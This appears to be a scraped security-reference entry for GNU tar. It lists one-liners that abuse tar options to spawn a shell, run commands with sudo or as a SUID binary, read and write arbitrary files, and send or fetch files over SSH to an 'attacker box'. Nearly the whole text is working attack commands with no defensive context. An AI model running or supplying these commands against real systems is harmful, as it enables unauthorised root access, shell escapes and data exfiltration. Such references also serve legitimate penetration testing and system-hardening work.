code |
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh |
description |
code |
This only works for GNU tar. |
tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"' |
description |
code |
This only works for GNU tar. It can be useful when only a limited command argument injection is available. |
echo '/bin/sh 0<&1' > "$TF"
tar cf "$TF.tar" "$TF"
tar xf "$TF.tar" --to-command sh
rm "$TF"*
description |
code |
This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions). |
export RUSER=root
export RFILE=/tmp/file_to_send.tar
export LFILE=file_to_send
tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh
description |
code |
This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions). |
export RUSER=root
export RFILE=/tmp/file_to_get.tar
tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh
description |
code |
This only works for GNU tar. |
echo DATA > "$TF"
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
description |
code |
This only works for GNU tar. |
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
code |
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh |
code |
./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh |